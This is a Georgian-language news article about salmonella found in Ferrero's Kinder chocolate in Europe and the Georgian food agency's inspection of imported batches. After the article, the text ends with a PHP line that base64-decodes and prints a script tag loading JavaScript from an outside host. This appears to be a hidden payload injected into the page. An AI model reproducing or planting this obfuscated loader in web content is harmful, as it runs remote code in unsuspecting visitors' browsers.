celsiusi
ავერსი საქკაბელი
 
ევროპის რამდენიმე ქვეყანაშ​ი, "ქინდერის" შოკოლადში საშიში ბაქტერია - სალმონელა აღმოაჩინეს. საეჭვო პროდუქტს მოხმარების ვადა 2022 წლის 12 ივლისამდე აქვს. ჯერ უცნობია, არის თუ არა გაყიდვაში ქართულ ბაზარზე "ქინდერის" ეს კონკრეტული პარტია, თუმცა მომხმარებლების ნაწილმა ბავშვების ერთ-ერთ ყველაზე საყვარელ ტკბილეულს უნდობლობა უკვე გამოუცხადა.
 
სურსათის სააგენტო მოქალაქეებს გაფრთხილებას აძლევს და აღნიშნავს, რომ არის თუ არა სალმონელას შემცველი შოკოლადი ქართულ ბაზარზე შეისწავლის და შედეგებს 2-3 დღეში გაასაჯაროებს. ტკბილეულის შემომტანი 4 ბიზნესოპერატორის პროდუქციის ინსპექტირება დაწყებულია. 
 
"პროდუქტის ამოღებას თვითონ ბიზნესოპერატორი უზრუნველყოფს, თუმცა მას ზედამხედველობას სურსათის ეროვნული სააგენტო გაუწევს. სწორედ ამიტომ არის მნიშვნელოვანი, რომ მომხმარებელიც აქტიური იყოს და თუ ვინმეს უკვე შეძენილი აქვს აღნიშნული დასახელების სურსათი, უნდა მივაქციოთ ყურადღება იმ პარტიის ნომრებს, რომელიც გამოქვეყნებულია სააგენტოს გვერდზე. დიდი შანსია, რომ ეგ პარტიები საქართველოში საერთოდ არ იყოს, მაგრამ ამას ვამოწმებთ," - აცხადებს სურსათის ეროვნული სააგენტოს უფროსის მოადგილე ვასილ ბასილაძე.
 
დიდ ბრიტანეთში, საფრანგეთში, გერმანიაში, ბელგიასა და კიდევ რამდენიმე ქვეყანაში სალმონელას ასობით შემთხვევა დაფიქსირდა, განსაკუთრებით 10 წლამდე ბავშვებში. ეს კი Fერრერო-ს მიერ წარმოებული სხვადასხვა დასახელების "ქინდერის" შოკოლადს დაუკავშირდა. ტკბილეულის ეს პარტია სხვადასხვა ქვეყნის ბაზრიდან უკვე გამოითხოვეს. 
 
ცნობისთვის, შოკოლადის საეჭვო პარტიის შესახებ, სურსათის უვნებლობის სააგენტომ ევროპის შესაბამისი კომისიიდან სწრაფი განგაშის სისტემით შეტყობინება 7 აპრილს მიიღო. 
886
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");